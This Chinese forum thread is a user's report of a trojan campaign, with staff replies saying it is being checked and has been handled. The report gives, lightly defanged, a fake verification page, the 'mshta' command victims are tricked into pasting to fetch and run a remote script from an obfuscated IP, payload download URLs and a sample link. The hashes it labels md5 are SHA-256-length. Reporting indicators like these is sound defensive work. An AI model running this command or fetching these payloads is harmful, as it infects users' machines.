xro 发表于 2026-2-28 18:38

木马反馈

模仿页面:http删s://reviewlo删ading删.t3.st删orage.de删v/inde删x.html
人机验证复制代码:mshta ht删tp://18删5删.0xC1.0x59.0x9E/reb删oot.pl
reboot.pl下载的文件:htt删ps://qua删ntifyr.s删ite/sup删port    (md5:c1dc9d15190da5e3f93ed747c240dfc6d4dea67018068fd3963e75ac6b09b7f2)
support下载文件:ht删tps://qu删antifyr.si删te/P.z删ip    (md5:52494d3232ae41ad8b39aaa67eaa46328026e37d3f2aa5b7a6275225c9b53875)
有木马样本,目前没有任何杀毒软件查杀(由微步云沙箱提供),MD5也是微步云沙箱上传的

瞿小凯 发表于 2026-3-2 09:39

已经处理,感谢反馈

xro 发表于 2026-2-28 18:45

样本链接:htt删ps://xiromic删163-my.sharep删oint.co删m/:f:/g/personal/web_e3_xsoar_cfd/IgB-MkH2nwxKR71po31_A2XuATLoiC-bwpIvfZunDvude4U?e=OosHTq

瞿小凯 发表于 2026-3-1 12:00

收到,我们先看下
页: [1]
查看完整版本: 木马反馈